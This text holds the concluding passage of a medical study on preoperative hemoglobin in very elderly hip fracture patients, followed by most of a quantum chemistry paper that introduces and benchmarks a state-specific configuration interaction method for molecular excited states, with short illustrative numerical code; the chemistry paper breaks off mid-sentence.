Our retrospective study explored the optimal preoperative hemoglobin level for elderly hip fracture patients over 80 years of age and concluded that a preoperative hemoglobin level >10 g/dL might be associated with lower postoperative morbidity and mortality, which supports the results of the Gu and TRIFE studies.
One strength of our study is its focus on the subgroup of hip fracture patients over 80 years, who are the most vulnerable hip fracture population and at the highest risk of perioperative morbidity and mortality. Another strength is the use of RCS to explore the optimal hemoglobin level for this group. There are also some limitations. First, this is a retrospective observational study; RCS and several complementary statistical analyses were used to test the validity of the results, and the 80-89 years subgroup analysis confirmed the conclusions. Second, a lower preoperative hemoglobin level (<10 g/dL) was associated with more transfusions, and transfusion itself may be associated with some of the clinical outcomes.
Conclusions
In conclusion, for hip fracture patients over 80 years, a preoperative hemoglobin level <10 g/dL was associated with an increase in postoperative MACEs, in-hospital mortality, and transfusion >2 U, and the same results were obtained after multivariable adjustment and subgroup analysis. This indicates that increasing the preoperative hemoglobin above 10 g/dL might lower postoperative MACEs, in-hospital mortality, and perioperative transfusion >2 U.
"year": 2023,
"sha1": "8a80b6e02107da482783a4c4b57093b521b839f6",
"oa_license": "CCBYNC",
"oa_url": "https://doi.org/10.1177/21514593231183611",
"oa_status": "GOLD",
"pdf_src": "PubMedCentral",
"pdf_hash": "8a80b6e02107da482783a4c4b57093b521b839f6",
"s2fieldsofstudy": [
"Medicine"
],
"extfieldsofstudy": [
"Medicine"
]
} |
State-Specific Configuration Interaction for Excited States
We introduce and benchmark a systematically improvable route for excited-state calculations, labeled state-specific configuration interaction (ΔCI), which is a particular realization of multiconfigurational self-consistent field and multireference configuration interaction. Starting with a reference built from optimized configuration state functions, separate CI calculations are performed for each targeted state (hence, state-specific orbitals and determinants). Accounting for single and double excitations produces the ΔCISD model, which can be improved with second-order Epstein–Nesbet perturbation theory (ΔCISD+EN2) or a posteriori Davidson corrections (ΔCISD+Q). These models were gauged against a vast and diverse set of 294 reference excitation energies. We have found that ΔCI is significantly more accurate than standard ground-state-based CI, whereas close performances were found between ΔCISD and EOM-CC2 and between ΔCISD+EN2 and EOM-CCSD. For larger systems, ΔCISD+Q delivers more accurate results than EOM-CC2 and EOM-CCSD. The ΔCI route can handle challenging multireference problems, singly and doubly excited states, from closed- and open-shell species, with overall comparable accuracy and thus represents a promising alternative to more established methodologies. In its current form, however, it is reliable only for relatively low-lying excited states.
I. INTRODUCTION
Most molecular electronic structure methods rely on different descriptions of ground and excited states. The ground state is described first, at a given level of theory, providing a baseline for later accessing the excited states, which in turn makes use of another approach or a distinct formalism altogether. For example, Kohn−Sham (KS) density-functional theory (DFT) is a ground-state method, 1−3 whereas the excited states are obtained later with a linear response treatment of time-dependent density-functional theory (TDDFT). 4−7 Similarly, the coupled-cluster (CC) 8−11 equations are solved for the ground state, whereas a diagonalization of the similarity-transformed Hamiltonian is implied in excited-state calculations based on the equation-of-motion (EOM) 12,13 or linear-response 14,15 formalisms. Within configuration interaction (CI) methods, 16 the underlying formalism is the same for ground and excited states, but typical implementations also rely on a special treatment for the ground state, given the use of ground-state Hartree−Fock (HF) orbitals and the fact that the truncated CI space is spanned by excitations from the ground-state HF determinant.
Whereas the above-mentioned methods rely on a single determinant reference, enlarging the reference space with more than one determinant gives rise to multireference approaches. In multiconfigurational self-consistent field (MCSCF), 17−20 the wave function is expanded as a linear combination of an arbitrary set of determinants, and the orbitals (and the coefficients of these determinants) are optimized to make the energy stationary. The most employed type of MCSCF is the complete active space self-consistent field (CASSCF), 18 which allows for all determinants generated by distributing a given number of electrons in a given number of active orbitals. Multireference CI (MRCI) offers a route to go beyond MCSCF by considering excited determinants generated from the reference space, which in practice is limited to single and double excitations (MRCISD). The MRCISD energy can be further improved with so-called Davidson corrections. 21−23 Apart from multireference approaches, 23,24 single-reference excited-state methods entail a formal distinction between the targeted excited states and the ground state. It is thus important to devise methods that minimize this unbalance as much as possible, aiming at a more unified description of ground and excited states while maintaining a modest computational cost. This also means a more balanced description among the excited states, and here we highlight the case of singly and doubly excited states, which differ by the number of excited electrons during the electronic transition. Most excited-state methodologies either fail to properly describe doubly excited states or require higher-order excitations to be accounted for. 25 In this sense, a methodology that offers comparable accuracy for singly and doubly excited states would be equally desirable.
MCSCF methods can be either state-averaged, when the reference space is optimized for an ensemble of (typically equally weighted) states, or state-specific, when the optimization is performed for one targeted state. The state-averaged strategy is much more used in practice mostly because of the more straightforward and reliable orbital optimization and the easier calculation of transition properties (given the common set of orbitals) when compared to the state-specific approach. 26−33 However, state-averaged MCSCF faces several issues. It struggles to describe higher-lying states or a large number of states, the orbitals may favor some states to the detriment of others, 34−37 the potential energy curves can become discontinuous, 36,38,39 and the calculation of energy derivatives is complicated by the energy averaging. 40−42 Many if not all of these problems do not appear in state-specific MCSCF, which in turn has to deal with a more challenging orbital optimization problem.
In light of these motivations, there has been ever-growing interest in state-specific MCSCF 36,37,43,44 and state-specific methods in general. The general principle is to employ a single formalism, approaching each state of interest independently and without resorting to any prior knowledge about the other states. The first and probably the most well-known state-specific method is ΔSCF, 45,46 where excited states are described by a single determinant and represent higher-lying solutions of the HF or KS equations. By optimizing the orbitals for a non-Aufbau determinant, ΔSCF attempts to recover relaxation effects already at the mean-field level. There is a growing body of evidence showing that DFT-based ΔSCF usually outperforms TDDFT, 43,47−56 most notably for doubly excited and charge transfer states. 50,51 However, ΔSCF still suffers from a major limitation for open-shell singlet states because of the strong spin contamination associated with the single-determinant ansatz. Restricted open-shell Kohn−Sham (ROKS) 47,57 offers one way around this problem, by optimizing the orbitals for a Lagrangian that considers both the mixed-spin determinant and the triplet determinant with spin projection M_s = 1. In wave function-based methods, excited-state mean field (ESMF) theory 43,52,53 has been proposed as a state-specific MCSCF alternative for excited states. In the ESMF approach, excited-state orbitals are optimized for a CI with single excitations (CIS) ansatz, 16 and energies can be further corrected with second-order Møller−Plesset (MP2) perturbation theory. 43,58 An extension of ESMF to DFT has also been proposed. 59 Variants of CC methods that directly target excited states have also been actively pursued. 60−63 An important practical question for all of the aforementioned methods concerns the optimization of orbitals for excited states, which typically appear as saddle point solutions in the orbital parameter space, 44,63−66 therefore being more difficult to obtain than ground-state solutions. 67−69 In this sense, specialized algorithms for obtaining excited-state orbitals have been proposed and developed by several groups. [48][49][50]54,55 Related methods that aim at describing multiple states within the same theoretical framework, though usually in a state-averaged fashion, include CASSCF, 18
II. STATE-SPECIFIC CI
Here we propose a particular realization of state-specific MCSCF and MRCI as a route for excited-state calculations.
First, the orbitals are optimized at the MCSCF level for a minimal set of configuration state functions (CSFs), as illustrated in Figure 1, which provides a state-specific reference.
By running separate calculations for the ground state and for a targeted excited state, excitation energies can be obtained as the energy difference between the individual total energies. We label this approach ΔCSF, in close parallel to the ΔSCF method. When compared with larger MCSCF choices, the compactness of ΔCSF avoids redundant solutions and is expected to facilitate convergence toward excited states. For a single-CSF ansatz in particular, the CI coefficients are fixed by the desired spin eigenstate, eliminating the redundancies associated with the coupling between CI coefficients and orbital rotations. Furthermore, by being a proper eigenstate of the total spin operator, ΔCSF cures the spin-contamination problem of ΔSCF, thus leading to truly state-specific orbitals and an improved reference, particularly for singlet excited states. Finally, being a mean-field method [with an O(N^5) computational cost associated with the integral transformation, where N is the number of basis functions], ΔCSF is intended to provide a balanced set of reference wave functions for a subsequent, more accurate calculation.
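For concreteness, the open-shell singlet CSF for a single excitation from occupied orbital i to virtual orbital a takes the standard spin-adapted form below (a generic textbook expression, not a formula specific to this work); the two determinants enter with coefficients fixed entirely by spin symmetry, which is the sense in which no CI coefficients remain to couple with the orbital rotations:

```latex
% Singlet CSF for the single excitation i -> a: the 1/sqrt(2) coefficients
% are dictated by spin symmetry, so the single-CSF ansatz has only orbital
% rotation parameters left to optimize.
|{}^{1}\Psi_{i}^{a}\rangle
  = \frac{1}{\sqrt{2}}
    \left( |\Phi_{i_{\alpha}}^{a_{\alpha}}\rangle
         + |\Phi_{i_{\beta}}^{a_{\beta}}\rangle \right)
```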
At this second stage, correlation effects are captured by performing separate MRCI calculations for each state. Since ground- and excited-state references are of mean-field quality and are state-specific, this particular type of MRCI calculation is labeled ΔCI here. When accounting for all single and double excitations, we obtain the ΔCISD model, which is now expected to provide decent excitation energies with an O(N^6) computational scaling. Notice that because we perform all singles and doubles with respect to each reference determinant, the maximum excitation degree is potentially higher than two (except of course for a one-determinant reference). This also applies to higher-order CI calculations. In this way, each state is described as much as possible in a state-specific way, with a different set of orbitals as well as determinants. Also notice that since we aim for a state-specific treatment of correlation, one cannot anticipate which root of the CI calculation corresponds to the state for which the orbitals have been optimized. It is not uncommon, for instance, to find a targeted excited state lower in energy than the physical ground state, since the former is much more correlated than the latter in the corresponding state-specific CI calculation. We identified the state of interest by simply inspecting the coefficients of the reference determinants.
We can further compute the renormalized second-order Epstein-Nesbet (EN2) perturbation correction 85 from the determinants left outside the truncated CISD space of each calculation, giving rise to the ΔCISD+EN2 model. The EN2 perturbative correction involves a single loop over external determinants that are connected to the internal determinants via at most double excitations, thus entailing an overall O(N^8) scaling associated with the number of quadruply excited determinants. Despite this unfavorable scaling, the corresponding prefactor of the EN2 perturbative correction is rather small, making such calculations affordable. Alternatively, we could calculate one of the several types of a posteriori Davidson corrections 21−23 in a state-specific fashion, leading to a ΔCISD+Q approach. We recall that computing Davidson corrections is virtually free, such that ΔCISD+Q presents the same computational cost and O(N^6) scaling as ΔCISD. 86 The remaining question is how to build an appropriate reference for each state of interest. Our general guideline is to select the smallest set of CSFs that provides a qualitatively correct description of the state of interest, as shown in Figure 1.
Here we adopted the spin-restricted formalism. The HF determinant is the obvious choice for the ground state of closed-shell singlets. For singly excited states of closed-shell systems, we chose either one or two CSFs, depending on each particular excited state. For most cases, a single CSF associated with two unpaired electrons should be enough. Some excited states, however, display strong multireference character, such as those of N 2 , CO 2 , and acetylene, thus requiring two CSFs. For genuine doubly excited states where a pair of opposite-spin electrons are promoted from the same occupied to the same virtual orbital, we selected a single determinant associated with the corresponding double excitation. In turn, open-shell doubly excited states were described with a single open-shell CSF (just as for most singly excited states). For ground and excited states of open-shell doublets, a single-determinant restricted openshell HF reference is adopted as well.
As mentioned before, our ΔCISD approach can be seen as a type of MRCI, although with two key differences with respect to typical realizations of MRCI. 23 First, it relies on a minimal set of CSFs as the reference space, whereas in typical applications of MRCI the reference is built from a much larger complete active space. This means that the CI space becomes more amenable in the former approach, enabling calculations for larger systems. The second important difference is that the reference in ΔCISD is state-specific, which is expected to favor the overall fitness of the orbitals when compared with state-averaged orbitals of standard MRCI (whenever excited states are involved). ΔCISD also resembles the ESMF theory 43,52,53 of Neuscamman and coworkers in their underlying motivation: a state-specific mean-field-like starting point, subject to a subsequent treatment of correlation effects. In ΔCISD, however, the starting point is much more compact and arguably closer to a mean-field description than the CIS-like ansatz of ESMF. This makes the CI expansion up to double excitations feasible in our approach, though not in ESMF, which in turn resorts to generalized MP2 to describe correlation. 43,58 This ΔCSF ansatz has already been suggested as a more compact alternative to the ESMF one 52 but again in the spirit of recovering correlation at the MP2 level, whereas we propose a state-specific CISD expansion that could be followed by Davidson or EN2 perturbative corrections.
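To make the +EN2 and +Q labels concrete, the working expressions have the standard forms sketched below (schematic versions; the precise renormalized EN2 and the seven Davidson variants are those of refs 85 and 23, respectively). Here |α⟩ runs over external determinants connected to the variational space, and c_0 generalizes to the summed weight of the reference CSFs in the multireference case:

```latex
% Schematic second-order Epstein-Nesbet correction over external
% determinants |alpha>, and the original Davidson +Q correction built
% from the squared reference weight c_0^2.
E_{\mathrm{EN2}}
  = \sum_{\alpha \notin \Delta\mathrm{CISD}}
    \frac{\left| \langle \Psi_{\mathrm{CISD}} | \hat{H} | \alpha \rangle \right|^{2}}
         {E_{\mathrm{CISD}} - \langle \alpha | \hat{H} | \alpha \rangle},
\qquad
\Delta E_{+\mathrm{Q}}
  = \left( 1 - c_{0}^{2} \right)
    \left( E_{\mathrm{CISD}} - E_{\mathrm{ref}} \right)
```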
III. COMPUTATIONAL DETAILS
Our state-specific CI approach was implemented in QUANTUM PACKAGE, 85 whose determinant-driven framework provides a very convenient platform for including arbitrary sets of determinants in the CI expansion. In this way, we can easily select only the determinants that are connected to the reference determinants according to a given criterion provided by the user. On top of that, the state-specific implementation further profits from the configuration interaction using a perturbative selection made iteratively (CIPSI) algorithm 87−90 implemented in QUANTUM PACKAGE, which allows for a large reduction of the CI space without loss of accuracy. At each iteration of the CIPSI algorithm, the CI energies are obtained with the Davidson iterative algorithm, 91 which ends when the EN2 perturbation correction computed in the truncated CI space lies below 0.01 mE_h. 90 Our state-specific CI implementation can be employed with different selection criteria for the excited determinants, based, for example, on the seniority number, 92 the hierarchy parameter, 93 or the excitation degree. Here, we considered the more traditional excitation-based CI. After the CI calculation, we computed the renormalized EN2 perturbation correction 85 from the determinants left outside the truncated CI space, which is relatively cheap because of the semistochastic nature of our algorithm. 94 We also evaluated the seven variants of Davidson corrections discussed in ref 23.
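As a didactic illustration of the selection principle only, the sketch below runs a CIPSI-like loop on a random symmetric matrix standing in for the Hamiltonian in a determinant basis. This is a deliberately simplified toy, not the QUANTUM PACKAGE implementation (which is determinant-driven, spin-adapted, and semistochastic): diagonalize in the selected space, estimate EN2-like contributions of external determinants, select the largest, and stop when the total PT2 estimate falls below a threshold.

```python
# Toy CIPSI-like selection on a random symmetric "Hamiltonian" matrix.
# Degenerate denominators and multi-state selection are not handled here.
import numpy as np

rng = np.random.default_rng(0)
n = 200
H = rng.normal(scale=0.01, size=(n, n))
H = 0.5 * (H + H.T)                                  # weak off-diagonal couplings
np.fill_diagonal(H, np.sort(rng.uniform(0.0, 5.0, size=n)))

selected = [0]                                       # start from one determinant
threshold = 1e-6                                     # toy stopping criterion
for _ in range(50):
    sub = H[np.ix_(selected, selected)]
    evals, evecs = np.linalg.eigh(sub)
    e_var, c = evals[0], evecs[:, 0]                 # variational state

    external = np.setdiff1d(np.arange(n), selected)
    coupling = H[np.ix_(external, selected)] @ c     # <alpha|H|Psi>
    e2 = coupling**2 / (e_var - H[external, external])  # EN2-like estimates

    if abs(e2.sum()) < threshold:                    # PT2 estimate converged
        break
    order = np.argsort(np.abs(e2))[::-1]             # most important first
    new = external[order[: max(1, len(selected))]]   # roughly double the space
    selected.extend(new.tolist())

print(f"{len(selected)} determinants, E = {e_var:.6f}, PT2 = {e2.sum():.2e}")
```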
To get state-specific orbitals, we first ran a CIS calculation and obtained the natural transition orbitals (NTOs), 95 which proved to be more suitable guess orbitals than the canonical HF orbitals. The dominant hole and particle NTOs are taken as the singly occupied orbitals, and for pronounced multireference states, the second most important pair of NTOs was also considered (as illustrated in Figure 1). For the doubly excited states, a non-Aufbau occupation of the canonical HF orbitals was used as the guess, based on the expected character of the excitation. The orbital optimization was performed with the Newton–Raphson method, also implemented in QUANTUM PACKAGE. 63,65
Having presented our state-specific approaches, our main goal here is to assess their performance in describing electronic excited states. For that, we calculated vertical excitation energies for an extensive set of 294 electronic transitions for systems, states, and geometries provided in the QUEST database. 96 We considered small- 97,98 and medium-sized 99,100 organic compounds, radicals, "exotic" systems, 101 and doubly excited states. 98−100 The set of excited states comprises closed-shell (singlets and triplets) and open-shell (doublets) systems, ranging from one to six non-hydrogen atoms and of various character (valence and Rydberg states as well as singly and doubly excited states). We employed the aug-cc-pVDZ basis set for systems having up to three non-hydrogen atoms and the 6-31+G(d) basis set for the larger ones. We compared the excitation energies obtained with our state-specific approaches against more established alternatives, such as CIS, 102 CIS with perturbative doubles [CIS(D)], 103,104 CC with singles and doubles (CCSD), 13,105−107 and the second-order approximate CC with singles and doubles (CC2), 108,109 with the latter two understood as EOM-CC. The excitation energies obtained with the different methodologies were gauged against very accurate reference values, of high-order CC or extrapolated full CI quality. [97][98][99]101 The complete set of reference methods and energies is provided in the Supporting Information.
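The NTO guess described above follows the standard construction: a singular value decomposition of the CIS transition amplitude matrix, whose leading singular vectors define the dominant hole/particle pair. A generic sketch in plain NumPy (independent of any particular code):

```python
import numpy as np

def natural_transition_orbitals(t_ia, c_occ, c_vir):
    """Hole/particle NTO pairs from a CIS-like transition amplitude matrix
    t_ia (n_occ x n_vir), via its singular value decomposition. c_occ and
    c_vir are AO x MO coefficient blocks for occupied and virtual orbitals."""
    u, s, vt = np.linalg.svd(t_ia, full_matrices=False)
    holes = c_occ @ u                 # hole NTOs, one per column
    particles = c_vir @ vt.T          # matching particle NTOs
    weights = s**2 / np.sum(s**2)     # relative importance of each pair
    return holes, particles, weights
```

A state with one dominant weight is a clean single-CSF case; a sizable second weight signals the multireference situations for which a second NTO pair is added to the reference.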
IV. RESULTS AND DISCUSSION
A. Orbital Optimization. Our first important result is that the Newton–Raphson method, started from NTO guess orbitals, proved to be quite reliable in converging the ΔCSF ansatz to excited-state solutions. To a great extent, this is assigned to the compact reference of ΔCSF, which avoids the redundant solutions associated with larger MCSCF references. In most cases, the orbitals are optimized in relatively few iterations (typically fewer than 10) and to the correct targeted state. A second-order method such as Newton–Raphson is required if the targeted solution is a saddle point in the orbital rotation landscape, which is expected to be the case for excited states. 44,66 At convergence, the number of negative eigenvalues of the orbital Hessian matrix, i.e., the saddle point order, can provide further insights into the topology of the solutions for a given CSF ansatz. The full list of saddle point orders is shown in the Supporting Information. For the closed-shell systems, we found that the lowest-lying solution (global minimum) obtained with the open-shell CSF is always an excited state, since it cannot properly describe the closed-shell character of the ground state. In turn, higher-lying excited states tend to appear as saddle points of increasing order as one goes up in energy, even though this behavior is not very systematic. It was not uncommon, for example, to encounter two different excited states that are both local minima or that share the same saddle point order. For some systems, we searched for symmetry-broken solutions of excited states by rotating the orbitals along the direction associated with a negative eigenvalue of the orbital Hessian, but this procedure led to solutions representing different states. We did not explore this exhaustively, though, and we cannot rule out the existence of symmetry-broken excited-state solutions. It is also worth mentioning that the starting orbitals typically presented a much larger number of negative Hessian eigenvalues, which decreased in the course of the orbital optimization. This means that the saddle point order cannot be anticipated on the basis of information about the unrelaxed orbitals or the expected ordering of the states.
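Counting the saddle point order is straightforward once the orbital Hessian is available; a minimal check (the toy Hessian is invented for illustration):

```python
import numpy as np

def saddle_point_order(orbital_hessian, tol=1e-8):
    """Number of negative eigenvalues of the (symmetric) orbital Hessian.
    A converged minimum has order 0; excited-state solutions typically
    converge to saddle points of order >= 1, as discussed in the text."""
    eigenvalues = np.linalg.eigvalsh(orbital_hessian)
    return int(np.sum(eigenvalues < -tol))

# Toy example: a 3x3 Hessian with one downhill direction -> order 1.
h = np.diag([-0.2, 0.1, 0.5])
print(saddle_point_order(h))  # 1
```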
Importantly, state-specific solutions could be found for different types of states, including singly and doubly excited states, for closed-shell singlets and open-shell doublets, and for the first as well as higher-lying states of a given point group symmetry. For this last class of states, however, our single CSF approach is not always reliable, especially for fully symmetric higher-lying states. In some cases, a closed-shell determinant is also important (as revealed by the subsequent CISD calculation) but remains outside the open-shell CSF reference. In these situations, employing both open-and closed-shell determinants in the reference is expected to improve the description of these higher-lying excited states, and we plan to explore this approach in the future. More generally, convergence issues would be expected at energies displaying a high density of excited states.
The excited-state reference could also be based on single-determinant ΔSCF orbitals rather than the ΔCSF orbitals we have adopted. However, the former method is heavily spin-contaminated, being an exact mixture of singlet and triplet, whereas the latter method targets one spin multiplicity at a time. In this way, the excitation energies obtained with ΔCSF appear above (for singlets) and below (for triplets) the single energy obtained with ΔSCF, overall improving the comparison with the reference values. In turn, we compared ΔSCF and ΔCSF excited-state orbitals in ΔCISD calculations and found overall little difference in the excitation energies. Still, we think ΔCSF is preferable because it delivers truly state-specific orbitals, whereas ΔSCF produces the same orbitals for the singlet and triplet states and is thus less state-specific.
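Because an exact 50/50 singlet/triplet mixture has an energy equal to the average of the two pure-state energies (assuming both states are built from the same orbitals), the ΔSCF value could in principle be spin-purified by the standard sum rule, which is exactly the pattern described above (singlet above, triplet below the mixed value). A minimal sketch under that assumption, with invented energies:

```python
def purified_singlet_energy(e_delta_scf, e_triplet):
    """Spin-purified singlet energy from the sum rule
    E_mix = (E_S + E_T) / 2, assuming the open-shell determinant is an
    exact 50/50 singlet/triplet mixture sharing one set of orbitals."""
    return 2.0 * e_delta_scf - e_triplet

# Invented numbers: the mixed energy sits halfway between the pure states.
print(purified_singlet_energy(-75.10, -75.15))  # -75.05
```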
B. State-Specific vs Standard CI. The state-specific ΔCI approach offers a well-defined route toward full CI by increasing the excitation degree, by analogy with standard ground-state-based CI methods. We explored both routes by calculating 16 excitation energies for small systems, considering up to quadruple excitations. (The full set of results is available in the Supporting Information.) Even though this is a small set for obtaining significant statistics, it is enough to showcase the main trends when comparing state-specific and ground-state-based CI methods. The mean signed error (MSE), mean absolute error (MAE), and root-mean-square error (RMSE) are shown in Table 1. The convergence for standard CI is quite slow, with CISD largely overestimating the excitation energies and CISDT leading to more decent results, which are improved at the CISDTQ level. In turn, we found that ΔCI displays much more accurate results and accelerated convergence compared with its ground-state-based counterparts. At the ΔCISD level, the accuracy is far superior to that of standard CISD, being comparable to that of CISDT. Going one step further (ΔCISDT) does not lead to a visible improvement, whereas the state-specific quadruple excitations of ΔCISDTQ recover much of the remaining correlation energy of each state and hence yield very accurate excitation energies. These observations parallel the common knowledge that the ground-state correlation energy is mostly affected by the double excitations and that quadruples are more important than triples, meaning that the state-specific ΔCI approach manages to capture correlation effects in a reasonably balanced way for ground and excited states. This also motivates us to investigate various flavors of the Davidson correction, which attempts to capture the missing contribution from the quadruple excitations. As will be discussed in more detail later, the popular Pople correction, 22 labeled ΔCISD+PC from here on, was found to be somewhat more accurate than the others. The comparable MAEs of ΔCISD and CISDT can be understood from the observation that the doubly excited determinants accessed from the excited-state reference can be reached only via triple excitations from the ground-state reference. The comparison between state-specific and ground-state-based CI for a given excitation degree (ΔCISD against CISD and ΔCISDTQ against CISDTQ) shows that the MAEs are reduced by 1 order of magnitude in the former route when compared with the latter. However, no gain is observed from CISDT to ΔCISDT.
C. State-Specific CI vs Other Methods. We now start the discussion on how well our state-specific CI approaches compare with more established methods by presenting in Figure 2 and Table 2 the distribution of errors and statistical measures associated with a set of 237 singly excited states of closed-shell systems.
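For reference, the three statistical measures used here and throughout (MSE, MAE, RMSE) follow the usual definitions over signed errors against the benchmark values; a short helper, with invented numbers for illustration:

```python
import numpy as np

def error_statistics(computed, reference):
    """MSE, MAE, and RMSE (in eV) of excitation-energy errors."""
    err = np.asarray(computed) - np.asarray(reference)
    return {"MSE": err.mean(),
            "MAE": np.abs(err).mean(),
            "RMSE": np.sqrt((err ** 2).mean())}

# Illustrative values only, not data from the paper.
print(error_statistics([4.10, 6.35, 7.02], [4.00, 6.50, 7.00]))
```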
At the ΔCSF level, the excitation energies are systematically underestimated, thus resulting in a substantially negative MSE. A large absolute MSE would be expected from any mean-field approach. At least to some extent, the bias toward underestimated energies appears because the CSF reference for the excited states (typically containing two determinants) already recovers some correlation, whereas the one-determinant HF reference of the ground state does not. The MAE of the ΔCSF approach (0.62 eV) is comparable to that of CIS (0.65 eV). The overall similar performance of these two methods is somewhat expected, since the orbital relaxation that takes place in the state-specific CSF is partially described via the single excitations of CIS.
Moving to the ΔCISD level, we find that correlation effects are described in a reasonably balanced way for the ground and excited states. The MAE is significantly reduced (0.18 eV) with respect to that of ΔCSF, being smaller than that of CIS(D) (0.21 eV) and comparable to that of CC2 (0.17 eV). The absolute MSE also decreases but remains negative, whereas the other CI- or CC-based methods present positive MSEs. This shows that there is still some bias toward a better description of excited states at the ΔCISD level, probably due to the two-determinant reference (compared to one determinant for the ground state). In addition, higher-lying fully symmetric states are not as well described at the ΔCISD level, reflecting the lack of a closed-shell determinant in the reference, as discussed above. However, we did not discard these states from the statistics.
The perturbative correction introduced with the ΔCISD+EN2 approach reduces the statistical errors even more, showing the same MAE as that of CCSD (0.06 eV). At times, however, the EN2 correction leads to erroneous results due to the presence of intruder states, which sometimes appear for the more problematic higher-lying states of a given symmetry. We discarded 10 out of 294 problematic cases when evaluating the statistics of the ΔCISD+EN2 results. Instead of relying on perturbation theory to correct the CISD total energies, we can resort to one of the Davidson corrections. 23 Even though this correction is not as accurate as the EN2 perturbative energy, more often than not it improves upon ΔCISD, with virtually no additional computational cost. For the ΔCISD+Q statistics, we discarded 12 out of 294 data points where ∥c∥ < 0.9, in which c gathers the coefficients of the reference determinants in the CI expansion. We found that all seven ΔCISD+Q variants provide MAEs in the 0.10−0.12 eV range, with the individual distribution of errors and statistical measures presented in Figure 3. As alluded to before, the Pople-corrected flavor, ΔCISD+PC, is arguably the most well-behaved, with fewer outlier excitation energies and the lowest MAE of 0.10 eV.
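Davidson-type corrections estimate the missing quadruples from the weight of the reference in the CI vector. As a hedged illustration, the sketch below implements only the original and renormalized forms together with the reference-weight screen quoted above; the Pople variant actually favored in the text, and the other variants of ref 23, follow different expressions that are not reproduced here.

```python
def davidson_q(e_ref, e_cisd, c0_sq, renormalized=False):
    """A posteriori estimate of the quadruples contribution missing from
    CISD. e_ref and e_cisd are the reference and CISD total energies;
    c0_sq is the squared weight of the reference determinant(s) in the
    normalized CI vector."""
    e_corr = e_cisd - e_ref          # CISD correlation energy (negative)
    dq = (1.0 - c0_sq) * e_corr      # original Davidson correction
    if renormalized:
        dq /= c0_sq                  # renormalized variant
    return e_cisd + dq

def keep_point(c_ref_coeffs, threshold=0.9):
    """||c|| >= 0.9 screen over the reference-determinant coefficients,
    as applied to the DCISD+Q statistics in the text."""
    return sum(c * c for c in c_ref_coeffs) ** 0.5 >= threshold
```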
We also surveyed the performance of our state-specific methods for 10 genuine doubly excited states 25 and 47 excited states of open-shell doublets (doublet−doublet transitions), 101 both sets extracted from the QUEST database. 96 The statistical measures are shown in Table 3, together with those of singly excited states of closed-shell systems. The important finding in this comparison is that the state-specific methods perform comparably well across these different classes of excited states. We notice that the MSE of ΔCSF is more negative for singly excited states of closed-shell molecules (−0.55 eV) than for doubly excited states (−0.20 eV), being closer to zero for doublet−doublet transitions (+0.07 eV), which reflects the one-determinant reference adopted for both the excited and ground states in the latter cases. However, this difference does not translate into comparatively smaller errors in the correlated results. For the doubly excited states, we further compare in Table 4 the performance of state-specific CI against that of higher-order CC methods. The accuracy of the ΔCSF mean-field model is superior to that of CC3 and approaches that of CCSDT, which highlights the importance of orbital relaxation for doubly excited states. ΔCISD is significantly more accurate than CCSDT, whereas the perturbative and Davidson corrections bring a small improvement. Recent developments and promising results with state-specific CC 54,62−64 and DFT 50,51 for doubly excited states are worth mentioning. However, these approaches are still restricted to states dominated by a single closed-shell determinant, whereas the ΔCISD approach can handle both closed- and open-shell doubly excited states. Out of the 10 doubly excited states we investigated, only 5 (beryllium, ethylene, formaldehyde, nitroxyl, and nitrosomethane) can be qualitatively described with a single closed-shell determinant, whereas at least 2 determinants are needed for the remaining 5 states: 2 closed-shell determinants for glyoxal and for the two states of the carbon dimer (C2) and 4 closed-shell determinants for the two states of the carbon trimer (C3).
D. Types of Excitations. The performance of our state-specific methods can also be assessed for specific types of excited states, e.g., for ππ* transitions or for systems of a given size. This is shown in Table 5, which compares the MAEs across different categories, whereas the corresponding MSEs and RMSEs can be found in Tables S1 and S2 in the Supporting Information. Many trends can be identified, but here we highlight the most noteworthy and interesting ones.
Starting with spin multiplicity, we found that the ΔCISD results are comparable for singlets and triplets, whereas the perturbative correction has a more pronounced effect for the triplets, bringing the MAE down to 0.06 eV, the same as that of CCSD (Tables 3 and 4).
Regarding the character of the excitations, we found that ΔCISD is considerably better for Rydberg (MAE of 0.12 eV) than for valence (MAE of 0.21 eV) excited states. In turn, the EN2 correction has a larger impact on valence excitations, making little difference for the Rydberg states, such that the ΔCISD+EN2 results become comparable for both types of excitation, with MAEs of 0.08 to 0.10 eV. Additional trends can be observed when dividing the valence excitations into nπ*, ππ*, or σπ* and the Rydberg excitations as taking place from n or π orbitals. Our state-specific methods are typically more accurate for nπ* excitations than for ππ* excitations. ΔCISD+EN2, for example, is as accurate as CCSD for nπ* transitions, with corresponding MAEs of 0.06 eV. We also found that the less common σπ* excitations are much better described across all methods than the more typical nπ* and ππ* transitions. For this type of state, ΔCISD+EN2 is the best-performing method, with MAEs as small as 0.03 eV. When the Rydberg states are separated by the character of the hole orbital, n or π, additional interesting features can be seen. Except for CCSD, all of the other methods considered here provide more accurate results for the Rydberg excitations involving the π orbitals. Not only that, but the MAEs are quite small and comparable across all methods (except for ΔCSF and CIS), ranging from 0.06 to 0.11 eV. Surprisingly, CIS is much more accurate for π Rydberg (MAE of 0.29 eV) than for n Rydberg (MAE of 1.17 eV) excitations.
The third and most important line of comparison concerns the system size. Under this criterion, we divided the excited states into three groups, small, medium, and large, depending on the number of non-hydrogen atoms (Table 5). We found that ΔCSF becomes more accurate as the system size increases, which we assign to a diminishing effect of the one- vs two-determinant imbalance discussed above. As the system size increases, the correlation energy recovered by the two determinants of the excited states (at the ΔCSF level) is expected to become smaller in comparison to the total correlation energy (associated with the full Hilbert space), thus alleviating this imbalance. In contrast, CISD should provide less accurate total energies for larger systems due to its well-known lack of size consistency. This issue would be expected to carry over, to some degree, to excitation energies, which are relative rather than absolute energies. However, the more balanced reference provided by ΔCSF might compensate for the lack of size consistency when larger systems are targeted. Indeed, ΔCISD presents comparable MAEs across the three sets of system size (0.15 to 0.18 eV). In contrast, ΔCISD+Q and ΔCISD+EN2 seem to go opposite ways: the former becomes more accurate, and the latter less accurate, as a function of system size. Similarly, CC2 becomes more accurate and CCSD loses accuracy as the system size increases, 99,110 to the point where the theoretically more approximate CC2 becomes the favored methodological choice. It remains to be seen how the absence of size consistency in ΔCISD impairs the results for systems even larger than those considered here, and to what extent Davidson or perturbative corrections reduce this problem. For molecules containing five or six non-hydrogen atoms, ΔCISD+EN2 becomes practically as accurate as CCSD, with MAEs in the 0.10−0.12 eV range. The ΔCISD+Q models turn out to be the most accurate choice for systems of this size, with MAEs ranging from 0.07 to 0.09 eV (Table S3 in the Supporting Information) and with ΔCISD+PC displaying a MAE of only 0.07 eV. In particular, ΔCISD+PC is more accurate than 